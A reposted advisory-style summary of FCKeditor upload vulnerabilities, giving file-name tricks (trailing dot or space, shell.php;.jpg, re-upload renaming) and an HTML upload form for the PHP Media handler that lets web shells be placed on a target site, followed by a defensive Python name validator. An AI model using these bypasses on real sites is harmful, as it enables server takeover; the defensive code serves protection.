FCKeditor common vulnerabilities: a summary of discovery and exploitation - Vulnerability warning - the black bar safety net

ID MYHACK58:62201452266
Type myhack58
Reporter Anonymous
Modified 2014-08-10T00:00:00


View Editor Version


2. Version 2.2

In Apache+Linux environments, appending a "." to the end of the uploaded file name bypasses the check. Tested.

3. Version <=2.4.2 for PHP: the PHP upload handler applies no file-type control to the Media type, so a user can upload any file. Save the following as an HTML file and modify the action address.

<form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>


4. Bypassing FCKeditor's replacement of "." with "_" in uploaded file names

In many cases an uploaded file such as shell.php.rar or shell.php;.jpg becomes shell_php;.jpg. This is a change in the newer versions of FCK.

4.1: Submit shell.php+space to bypass

However, the space only works on Windows systems; *nix does not support it [shell.php and shell.php+space are 2 different files]. Not tested.

4.2: Uploading a file with the same name again can turn it into shell.php;(1).jpg. You can also create a new folder: only the first-level directory is checked, so jumping to a second-level directory is not restricted.
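
An added example, not part of the original article and not FCKeditor's own code: a server-side file name check that rejects the naming tricks described above (trailing dot or space, semicolon, an executable extension in any segment) and enforces a per-type extension allowlist, which is the control the Type=Media handler lacked. The allowlist contents, the executable-extension set and the function names are assumptions.

```python
import re
import secrets

# Assumed per-type allowlists; trim them to what the application needs.
ALLOWED = {
    "Image": {"jpg", "jpeg", "png", "gif"},
    "Media": {"mp3", "mp4", "avi", "wmv"},
    "File": {"pdf", "txt", "zip", "rar"},
}
# Extensions a web server may execute; checked in every dot-separated segment.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar",
              "asp", "aspx", "asa", "cer", "jsp", "cgi", "pl"}


def check_upload_name(name, upload_type):
    """Return (ok, reason) for a client-supplied upload file name."""
    allowed = ALLOWED.get(upload_type)
    if allowed is None:
        return False, "unknown upload type"
    base = name.replace("\\", "/").rsplit("/", 1)[-1]  # drop any client path
    if not base or base != base.strip(" ."):
        return False, "leading or trailing dot/space"
    if re.search(r"[;:%\x00-\x1f]", base):
        return False, "forbidden character"
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[-1] not in allowed:
        return False, "extension not allowed for this type"
    if any(p.strip() in EXECUTABLE for p in parts[1:]):
        return False, "executable extension in name"
    return True, "ok"


def storage_name(name):
    """Random stem plus the validated extension; call only after the check passes."""
    return f"{secrets.token_hex(16)}.{name.rsplit('.', 1)[-1].lower()}"


# Constructed sample names covering the cases described in this article.
SAMPLES = [
    ("shell.php", "Media"), ("shell.php.", "Media"), ("shell.php ", "Media"),
    ("shell.php.rar", "File"), ("shell.php;.jpg", "Image"),
    ("shell.php;(1).jpg", "Image"), ("holiday.jpg", "Image"),
]

if __name__ == "__main__":
    for sample, kind in SAMPLES:
        print(f"{sample!r:22} {kind:6} -> {check_upload_name(sample, kind)}")
```

Storing the file under the name returned by storage_name, in a directory where script execution is disabled, means the client-supplied name never reaches the file system.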
